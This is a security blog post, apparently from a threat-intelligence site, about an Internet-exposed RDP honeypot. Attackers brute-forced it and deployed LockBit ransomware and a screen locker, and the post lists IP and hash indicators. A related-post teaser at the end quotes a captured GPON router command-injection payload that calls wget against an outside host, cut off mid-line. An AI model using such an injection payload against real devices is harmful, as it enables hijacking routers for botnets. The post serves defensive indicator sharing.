Skip to main content

Inside a Compromised RDP Server - Bruteforcing Leads to LockBit Ransomware

As people trend towards remote work, IT departments have an ongoing need to provide remote services to end users. Without the use of traditional VPNs, technologies like Remote Desktop, Citrix and VMware are commonly used for remote access. However, they are not always configured in secure ways. 

During the height of the pandemic, we setup two servers with Remote Desktop exposed to the Internet and created user "hello" with no password. Obviously, this is not a smart idea, but it does demonstrate what can happen when you have unsecured assets that are available directly on the Internet. 

Scenario 1: Network Scanner Resulting in Abuse Complaint

A scanning tool was used to scan for other servers listing on port 3389, which resulted in a complaint from Hetzner Online GmbH. The complaint was as follows:
Figure 1: Abuse Complaint Received


It is good that Hetzner has automated monitoring systems that will send abuse complaints automatically and one step in the right direction to make the Internet a safer place.

Scenario 2: LockBit Ransomware

LockBit is a ransomware variant that reportedly emerged in 2019. It functions as a ransomware-as-a-service (RaaS) model where developers write the encryptors and then share out encryptors to affiliates who conduct intrusions and deploy the encryptor on victim systems. As victims pay the ransom, the developers get a percentage or commission based on the total ransom paid.  

In this scenario, the first unauthorized logon originated from the IP address 82.102.20.219, however no malicious activity appeared to take place as a result of this login. Interestingly enough, three additional logons are observed from IP addresses afterwards, leading up to a final logon when LockBit ransomware is deployed. A timeline of events is below:

Figure 2: Timeline of Events


Once the ransomware executable is run on the system, it proceeds to delete Volume Shadow Copies as one of the steps to inhibit recovery efforts. As files are encrypted, a ransom note named Restore-My-Files.txt is dropped:

Figure 3: Ransom Note


The threat actor then returns to the system an hour later to run screensaver.exe, which is a malware known as ScreenLocker that effectively locks your screen and prevents you from using the system. 

We've captured the indicators into our database and made them searchable on sicehice.com. As an example, you can use our Bulksearch feature to download a CSV formatted list of lookups for these IPs.

Indicators of Compromise

IOC Type Description
54.38.212.197 IPv4 RDP Bruteforce IP
185.202.2.121 IPv4 RDP Bruteforce IP
51.89.134.150 IPv4 RDP Bruteforce IP
104.237.255.254 IPv4 RDP Bruteforce IP
62.76.112.121 IPv4 RDP Bruteforce IP
167.172.239.68 IPv4 RDP Bruteforce IP
82.202.247.81 IPv4 RDP Bruteforce IP
82.102.20.219 IPv4 Unauthorized RDP Login
51.15.18.180 IPv4 Unauthorized RDP Login
52.237.96.13 IPv4 Unauthorized RDP Login
f9073cc6566ba11318b425a761f1ce17 MD5 ScreenLock Executable: screensaver.exe
1f4581b36253f0f5d63e68347d1744a7 MD5 LockBit Executable: 81F3696546327500.exe
bfc879a4a959a3bd23892448afbd75b6 MD5 Ransom Note: Restore-My-Files.txt

Comments

Popular posts from this blog

AndroxGh0st – Stealing your AWS Key Pairs for Simple Email Service

AndroxGh0st is a family of malware written in Python that notoriously targets Laravel .env files. Since the inception of our new fleet of web honeypots deployed in December 2021, Sicehice has detected this activity and observed tens of thousands of requests with the HTTP POST body set to 0x[]=androxgh0st . Searching this string on GitHub yields various repositories, many of which help identify AWS secrets inadvertently exposed by the Laravel framework. One feature of AndroxGh0st is the ability to search for exposed AWS credentials, namely looking for AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY identifiers. While individuals may mistakenly leak their key pairs to version control repositories such as GitHub, GitLab, or BitBucket, there is always the possibility of inadvertently leaking key pairs directly on web servers as well. AWS has gone through efforts to continually scan GitHub for AWS key pairs and automatically apply the AWS managed policy AWSCompromi

300 Days of New Web Honeypots

During December 2021, we deployed a new fleet of custom web honeypots written in Python Flask. The ongoing detections have been incorporated into our database as of January 3, 2022 and we are also pushing our detection feed to VirusTotal Collections . Approaching one year of of collections, here are some observations and stats: Locations where sensors are deployed: Sydney, AU Madrid, ES Amsterdam, NL Moscow, RU (which was forcibly shutdown due to sanctions imposed as a result of the 2022 Russian invasion of Ukraine) Chicago, US New Jersey, US Iowa, US We observed nearly 500,000 requests from over 38,000 unique IPs. A majority of the malware payloads we have observed are related to the Mozi botnet. You can find the related indicators shared on Abuse.ch ThreatFox here.   An example of this exploit observed in the POST body which targets GPON home routers (CVE-2018-10561) is as follows: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://221.205.75.243:48